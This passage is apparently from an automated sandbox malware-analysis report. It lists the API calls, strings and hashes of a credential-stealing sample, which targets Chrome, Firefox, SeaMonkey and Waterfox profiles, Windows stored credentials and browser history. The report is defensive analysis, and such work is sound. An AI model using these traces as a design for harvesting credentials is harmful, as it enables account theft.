                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040B71C
                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                    • wcsrchr.MSVCRT ref: 0040B738
                    • memset.MSVCRT ref: 0040B756
                    • memset.MSVCRT ref: 0040B7F5
                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                    • memset.MSVCRT ref: 0040B851
                    • memset.MSVCRT ref: 0040B8CA
                    • memcmp.MSVCRT ref: 0040B9BF
                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                    • memset.MSVCRT ref: 0040BB53
                    • memcpy.MSVCRT ref: 0040BB66
                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                    • String ID: chp$v10
                    • API String ID: 170802307-2783969131
                    • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                    • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                    • memset.MSVCRT ref: 0040E380
                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                    • wcschr.MSVCRT ref: 0040E3B8
                    • memcpy.MSVCRT ref: 0040E3EC
                    • memcpy.MSVCRT ref: 0040E407
                    • memcpy.MSVCRT ref: 0040E422
                    • memcpy.MSVCRT ref: 0040E43D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                    • API String ID: 3073804840-2252543386
                    • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                    • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                    • String ID:
                    • API String ID: 3715365532-3916222277
                    • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                    • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                      • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                    • CloseHandle.KERNEL32(?), ref: 0040E148
                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                    • String ID: bhv
                    • API String ID: 327780389-2689659898
                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                    • API String ID: 2941347001-70141382
                    • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                    • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                    • String ID:
                    • API String ID: 2827331108-0
                    • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                    • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                    • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                    • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040C298
                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                    • wcschr.MSVCRT ref: 0040C324
                    • wcschr.MSVCRT ref: 0040C344
                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                    • GetLastError.KERNEL32 ref: 0040C373
                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                    • String ID: visited:
                    • API String ID: 1157525455-1702587658
                    • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                    • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                    • memset.MSVCRT ref: 0040E1BD
                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                    • _snwprintf.MSVCRT ref: 0040E257
                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                    • API String ID: 3883404497-2982631422
                    • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                    • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                    • memset.MSVCRT ref: 0040BC75
                    • memset.MSVCRT ref: 0040BC8C
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                    • memcmp.MSVCRT ref: 0040BCD6
                    • memcpy.MSVCRT ref: 0040BD2B
                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                    • String ID:
                    • API String ID: 509814883-3916222277
                    • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                    • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                    Control-flow Graph

                    APIs
                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                    • GetLastError.KERNEL32 ref: 0041847E
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile$??3@ErrorLast
                    • String ID: |A
                    • API String ID: 1407640353-1717621600
                    • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                    • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                    • String ID: r!A
                    • API String ID: 2791114272-628097481
                    • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                    • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                    APIs
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                    • _wcslwr.MSVCRT ref: 0040C817
                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                    • wcslen.MSVCRT ref: 0040C82C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                    • API String ID: 62308376-4196376884
                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                    APIs
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                    • wcslen.MSVCRT ref: 0040BE06
                    • _wcsncoll.MSVCRT ref: 0040BE38
                    • memset.MSVCRT ref: 0040BE91
                    • memcpy.MSVCRT ref: 0040BEB2
                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                    • wcschr.MSVCRT ref: 0040BF24
                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                    • String ID:
                    • API String ID: 3191383707-0
                    • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                    • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                    APIs
                    • memset.MSVCRT ref: 00403CBF
                    • memset.MSVCRT ref: 00403CD4
                    • memset.MSVCRT ref: 00403CE9
                    • memset.MSVCRT ref: 00403CFE
                    • memset.MSVCRT ref: 00403D13
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 00403DDA
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                    • String ID: Waterfox$Waterfox\Profiles
                    • API String ID: 3527940856-11920434
                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                    APIs
                    • memset.MSVCRT ref: 00403E50
                    • memset.MSVCRT ref: 00403E65
                    • memset.MSVCRT ref: 00403E7A
                    • memset.MSVCRT ref: 00403E8F
                    • memset.MSVCRT ref: 00403EA4
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 00403F6B
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                    • API String ID: 3527940856-2068335096
                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                    APIs
                    • memset.MSVCRT ref: 00403FE1
                    • memset.MSVCRT ref: 00403FF6
                    • memset.MSVCRT ref: 0040400B
                    • memset.MSVCRT ref: 00404020
                    • memset.MSVCRT ref: 00404035
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 004040FC
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                    • API String ID: 3527940856-3369679110
                    • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
